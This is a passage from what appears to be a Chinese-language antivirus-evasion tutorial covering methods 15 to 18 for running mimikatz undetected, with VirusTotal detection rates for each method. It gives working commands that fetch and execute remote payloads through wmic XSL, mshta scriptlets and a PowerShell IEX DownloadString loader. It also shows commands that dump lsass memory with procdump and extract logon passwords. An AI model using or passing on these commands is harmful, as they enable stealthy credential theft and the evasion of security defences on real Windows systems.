方法15-JScript的xsl版(VT查杀率7/60)
下载
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.xsl本地加载
wmic os get /format:"mimikatz.xsl"远程加载
wmic os get /format:"https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.xsl"
放行后
virustotal.com上mimikatz.xsl查杀率为7/60。
方法16-jscript的sct版(VT查杀率23/59)
参考远控免杀专题(37)-白名单Mshta.exe执行payload(VT免杀率26-58):https://mp.weixin.qq.com/s/oBr-syv2ef5IjeGFrs7sHg
下载
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.sct执行
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.sct").Exec(); log coffee exit360拦截依旧
virustotal.com上mimikatz.sct查杀率为23/59。
方法17-ReflectivePEInjection加载(VT查杀率32/57)
ReflectivePEInjection是powersploit里的比较有名的一个pe加载脚本,很好使。
下载
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-ReflectivePEInjection.ps1执行
powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl "http://10.211.55.2/mimikatz/x64/mimikatz.exe" -ExeArgs "sekurlsa::logonpasswords" -ForceASLR
这个用什么来衡量免杀都不太合适,我就用Invoke-ReflectivePEInjection.ps1吧。在virustotal.com上Invoke-ReflectivePEInjection.ps1查杀率为32/57。
方法18-导出lsass进程离线读密码(VT查杀率0/72)
windows有多款官方工具可以导出lsass进程的内存数据,比如procdump.exe、SqlDumper.exe、Out-Minidump.ps1等,我这里以procdump.exe为例进行演示。
procdump.exe工具是微软出品的工具,具有一定免杀效果。可以利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码。
procdump.exe下载https://github.com/TideSec/BypassAntiVirus/tree/master/tools/mimikatz/procdump.exe
在目标机器执行下面命令,导出lsass.dmp
procdump.exe -accepteula -ma lsass.exe lsass.dmp再使用mimikatz读取密码
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit需要注意的是从目标机器导出的lsass.dmp需要在相同系统下运行。